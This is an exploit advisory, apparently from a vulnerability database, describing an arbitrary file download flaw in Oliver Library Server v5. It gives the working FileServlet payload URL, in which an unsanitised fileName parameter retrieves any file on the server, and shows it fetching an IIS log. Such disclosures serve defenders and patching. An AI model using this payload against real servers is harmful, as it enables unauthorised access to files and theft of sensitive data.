Oliver Library Server v5 Arbitrary File Download

2021.12.19
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-200

# Exploit Title: Oliver Library Server v5 - Arbitrary File Download # Date: 14/12/2021 # Exploit Authors: Mandeep Singh, Ishaan Vij, Luke Blues, CTRL Group # Vendor Homepage: https://www.softlinkint.com/product/oliver/ # Product: Oliver Server v5 # Version: < 8.00.008.053 # Tested on: Windows Server 2016 Technical Description: An arbitrary file download vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file download by an attacker using unsanitized user supplied input. Steps to Exploit: 1) Use the following Payload: https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=<arbitrary file path> 2) Example to download iis.log file: https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=c:/windows/iis.log


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top